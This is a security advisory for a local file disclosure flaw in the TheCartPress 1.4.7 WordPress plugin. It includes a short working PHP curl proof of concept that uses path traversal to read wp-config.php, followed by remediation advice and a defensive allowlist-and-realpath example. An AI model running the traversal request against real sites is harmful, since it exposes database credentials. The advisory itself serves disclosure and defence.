WordPress TheCartPress 1.4.7 Local File Disclosure Vulnerability

Summary

    The WordPress plugin TheCartPress v1.4.7 suffers from multiple vulnerabilities: a remote attacker can disclose local files or achieve remote code execution.


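<?php

// Proof of concept: request Miranda.class.php with a "page" parameter that
// traverses out of the plugin directory to wp-config.php.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://[target].com/wp-content/plugins/thecartpress/modules/Miranda.class.php?page=../../../../../../../../wp-config.php");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
// Return the response body from curl_exec() instead of printing it directly.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$buf = curl_exec($ch);
curl_close($ch);
unset($ch);

// Print whatever the server returned.
echo $buf;

?>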

Solution

    1. Modify the source code to strictly filter parameter values such as "../" and "..\" and all special characters that may cause a Local File Inclusion attack;

    2. If you have purchased an NGAF appliance, update the WAF signature database to version 20151218 or above.
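
One way to implement the source-code fix in item 1, shown as an added example that is not TheCartPress code: it uses an allowlist plus realpath() containment rather than stripping "../" substrings. The function name tcp_example_resolve_page(), the mapping of a page name to "<name>.php" in a single directory, and the demo directory are assumptions made for illustration.

```php
<?php
// Added example; tcp_example_resolve_page() is a hypothetical helper, not plugin code.
function tcp_example_resolve_page(string $page, string $baseDir): ?string
{
    // 1. Allowlist the name: letters, digits, "_" and "-" only. This rejects
    //    "/", "\", ".", NUL bytes and anything else usable for traversal.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $page)) {
        return null;
    }
    // 2. Canonicalise the base directory and the candidate file.
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $page . '.php');
    if ($candidate === false || !is_file($candidate)) {
        return null; // no such page
    }
    // 3. Containment: the resolved path must still be under $base,
    //    which also catches symlinks that point outside the directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed demo: a temporary directory holding one legitimate page file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tcp_example_' . uniqid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'checkout.php', '<?php // demo');

$inputs = [
    'checkout',                               // legitimate page name
    '../../../../../../../../wp-config.php',  // value used in the request above
    '..\\..\\wp-config.php',                  // backslash variant
    'missing',                                // well-formed but no such file
];
foreach ($inputs as $in) {
    $out = tcp_example_resolve_page($in, $dir);
    printf("%-42s => %s\n", $in, $out === null ? 'rejected' : $out);
}

unlink($dir . DIRECTORY_SEPARATOR . 'checkout.php');
rmdir($dir);
```

Only the resolved path returned by the helper should ever be passed to include or a file read; the raw request parameter is never used to build a path directly.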